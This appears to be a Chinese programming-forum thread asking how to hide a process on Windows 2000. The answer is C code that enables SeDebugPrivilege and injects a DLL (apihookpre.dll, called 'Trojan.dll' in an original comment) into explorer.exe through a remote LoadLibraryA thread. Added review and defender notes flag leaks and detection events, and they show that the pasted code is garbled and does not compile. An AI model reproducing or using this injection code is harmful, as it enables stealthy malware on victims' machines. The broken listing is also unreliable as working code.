关于进程在win2k下隐藏的问题

我拜读过很多大大写的关于进程隐藏的帖子,但是还是不知道如何在win2k下隐藏进程。是否能给一段最简单的对话框程序完成进程的隐藏呢?谢谢

解决方案 »

#include "tlhelp32.h"
HANDLE hRemoteThread,hRemoteProcess;
DWORD dwRemoteProcessid;      // PID of the target process; assigned in main()
LPVOID pszLibFileRemote=NULL; // address of the DLL-path string inside the target process; intended to be assigned in main()

/*
 * ProcesstoPid - return the PID of the first running process whose image name
 * equals `pid` (case-insensitive), or 0 if nothing matches or the Toolhelp
 * snapshot cannot be taken.  Despite its name, `pid` is the image name to look
 * for (e.g. "explorer.exe"), not a process id.
 *
 * NOTE(review): 0 is returned both for "not found" and for every failure, so a
 * caller cannot tell the cases apart; main() below does not check for 0 at all.
 * NOTE(review): the early `return pe32.th32ProcessID;` on a match, and the
 * `return 0;` on the Process32First() failure path, both skip the CloseHandle()
 * at the bottom, so the snapshot handle leaks on those paths.
 */
DWORD ProcesstoPid(char *pid) // look up the PID (Process ID) of the named process
{
    HANDLE hProcessSnap=NULL;
    char buffer[MAX_PATH];
    PROCESSENTRY32 pe32={0};
    int i;
    hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); // take a snapshot of the process list
    if(hProcessSnap==(HANDLE)-1) // (HANDLE)-1 is INVALID_HANDLE_VALUE
    {
        printf("CreateToolhelp32Snapshot() Error: %d",GetLastError()); // NOTE(review): GetLastError() returns a DWORD; %d expects int (%lu would match)
        return 0;
    }
    pe32.dwSize=sizeof(PROCESSENTRY32);
    if(Process32First(hProcessSnap,&pe32)) // start enumerating processes
    {
        do
        {
            strcpy(buffer,pe32.szExeFile); // both arrays are MAX_PATH bytes, so this copy fits
            for(i=strlen(buffer);i>0;i--) // strip any leading path from the image name
                if(buffer[i]=='\\')
                    break;
            // NOTE(review): when a backslash is found, i indexes the backslash itself, so
            // &buffer[i] still begins with '\\' and can never equal a bare file name; the
            // lookup only works because szExeFile normally carries no path component.
            if(!stricmp(pid,&buffer[i])) // compare with the requested name; on a match return its PID
                return pe32.th32ProcessID; // snapshot handle is not closed on this path
        }
        while(Process32Next(hProcessSnap,&pe32)); // next process
    }
    else
    {
        printf("Process32First() Error: %d",GetLastError()); // snapshot handle is not closed on this path either
        return 0;
    }
    CloseHandle(hProcessSnap); // close the snapshot handle (only reached when nothing matched)
    return 0;
}

/*
 * SetPrivilege - enable SE_DEBUG_NAME (SeDebugPrivilege) in the current
 * process token.  Returns FALSE only when the token cannot be opened, TRUE
 * otherwise.
 *
 * NOTE(review): the results of LookupPrivilegeValue() and
 * AdjustTokenPrivileges() are ignored, and AdjustTokenPrivileges() reports
 * success even when the privilege could not be enabled (it then sets
 * ERROR_NOT_ALL_ASSIGNED), so TRUE does not mean the privilege is actually
 * held.  hToken is never closed.
 * Defender's note: a process enabling SeDebugPrivilege in its own token is a
 * commonly monitored precursor to cross-process access; for an explorer.exe
 * running as the same user it is presumably not even required - confirm.
 */
BOOL SetPrivilege() // this function raises privileges, to SE_DEBUG_NAME
{
    TOKEN_PRIVILEGES tkp;
    HANDLE hToken;
    if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken)) // could not open the current process token
        return FALSE;
    LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tkp.Privileges[0].Luid); // look up the LUID of the privilege (return value unchecked)
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0); // apply the adjustment configured above (return value unchecked, hToken leaked)
    return TRUE;
}
/*
 * main - entry point.  Locates explorer.exe, enables SeDebugPrivilege, then
 * loads apihookpre.dll from the current directory into that process by the
 * classic remote-thread sequence: OpenProcess -> VirtualAllocEx ->
 * WriteProcessMemory -> CreateRemoteThread with LoadLibraryA as the start
 * routine and the remote path string as its argument.
 *
 * Defender's note: this sequence is MITRE ATT&CK T1055.001 (DLL injection).
 * On current Windows it is heavily instrumented - Sysmon Event ID 10
 * (ProcessAccess, keyed on the access mask requested below), Sysmon Event ID 8
 * (CreateRemoteThread, which records the start function), the ETW
 * threat-intelligence provider and EDR user-mode hooks all surface it - and a
 * foreign DLL loaded into explorer.exe is visible to module listing and
 * signature/hash checks.
 *
 * NOTE(review): hRemoteThread and hRemoteProcess are globals declared above
 * this listing (`HANDLE hRemoteThread,hRemoteProcess;`).  As pasted, this
 * function does not compile: "GetCommandLine()if(...)" lacks a ';', and three
 * `//` comments swallowed the `if(...)` / VirtualAllocEx() statements that
 * followed them on the same line (each marked below).  Every `return -1;`
 * after OpenProcess() also leaks the process handle and the remote buffer.
 */
int main()
{
    int cb;
    PTHREAD_START_ROUTINE pfnstartaddr;
    DWORD Threadid=0;
    char pszlibfilename[MAX_PATH];
    dwRemoteProcessid=ProcesstoPid("explorer.exe"); // original comment: get notepad's PID - EXPLORER.EXE's PID works too, but the DLL then stays resident until that process is ended. NOTE(review): a 0 result (not found / snapshot failure) is not checked and goes straight to OpenProcess().
    GetCurrentDirectory(MAX_PATH,pszlibfilename); // get the current directory path. NOTE(review): return value unchecked; on failure the buffer may be left uninitialized and the strlen()-1 index below is then undefined behaviour.
    if(pszlibfilename[strlen(pszlibfilename)-1]!='\\') // does the path already end in a backslash (i.e. is it a root directory)?
        strcat(pszlibfilename,"\\apihookpre.dll"); // NOTE(review): unbounded strcat into a MAX_PATH buffer; overflows for a long directory path
    else
        strcat(pszlibfilename,"apihookpre.dll"); // append the file name of the DLL to inject (the original comment calls it Trojan.dll)
    GetCommandLine()if(!SetPrivilege()) // NOTE(review): stray "GetCommandLine()" with no ';' - syntax error as pasted
    {
        printf("Error in SetPrivilege(): %d ",GetLastError());
        return 1;
    }
    hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,FALSE,dwRemoteProcessid); // open the target process (original comment: notepad.exe) to get a handle; note the first parameter, the access rights requested. NOTE(review): in this paste the comment swallowed the following "if(!hRemoteProcess)", so the block below is unconditional as shown.
    {
        printf("Remote Process not Exist or Access Denied ");
        return -1;
    }
    cb=(1+strlen(pszlibfilename))*sizeof(char); // length of the DLL path including the NUL. NOTE(review): the paste's comment on this line swallowed "pszLibFileRemote=VirtualAllocEx(hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE);" (allocate space for the path in the target) and "if(!pszLibFileRemote)", so as shown nothing is allocated and the block below is unconditional.
    {
        printf("VirtualAllocEx() Error: %d",GetLastError());
        return -1;
    }
    if(!WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(PVOID)pszlibfilename,cb,NULL)) // write the DLL path into the space allocated in the target
    {
        printf("WriteProcessMemory() Error: %d",GetLastError()); // NOTE(review): hRemoteProcess and the remote buffer are not released on this path (nor on the returns below)
        return -1;
    }
    pfnstartaddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("Kernel32.dll"),"LoadLibraryA"); // get the address of LoadLibraryA. NOTE(review): the paste's comment swallowed the following "if(!pfnstartaddr)", so the block below is unconditional as shown.
    {
        printf("GetProcAddress() Error: %d",GetLastError());
        return -1;
    }
    hRemoteThread=CreateRemoteThread(hRemoteProcess,NULL,0,pfnstartaddr,pszLibFileRemote,0,&Threadid); // create a remote thread whose argument is the DLL path
    printf("inject successfully"); // NOTE(review): printed before hRemoteThread is checked, so "success" is reported even when CreateRemoteThread() failed
    if(!hRemoteThread)
    {
        printf("CreateRemoteThread() Error: %d ",GetLastError());
        return -1;
    }
    WaitForSingleObject(hRemoteThread,INFINITE); // wait; a timeout could be used, here it waits forever
    if(pszLibFileRemote!=NULL) // cleanup follows
    {
        VirtualFreeEx(hRemoteProcess,pszLibFileRemote,0,MEM_RELEASE);
    }
    if(hRemoteThread !=NULL)
    {
        CloseHandle(hRemoteThread);
    }
    if(hRemoteProcess!=NULL)
    {
        CloseHandle(hRemoteProcess);
    }
    printf("Done!");
    return 0;
}